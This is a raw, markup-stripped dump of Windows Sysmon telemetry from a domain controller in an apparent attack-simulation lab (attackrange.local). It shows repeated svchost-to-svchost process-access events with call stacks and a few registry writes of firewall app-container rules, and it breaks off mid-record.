13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.117{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-9|C=S-1-15-3-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|M=microsoft.accountscontrol_cw5n1h2txyewy|Name=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\|PFN=Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{BA9AD02E-B8F1-4B33-BE00-C335F110B645}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 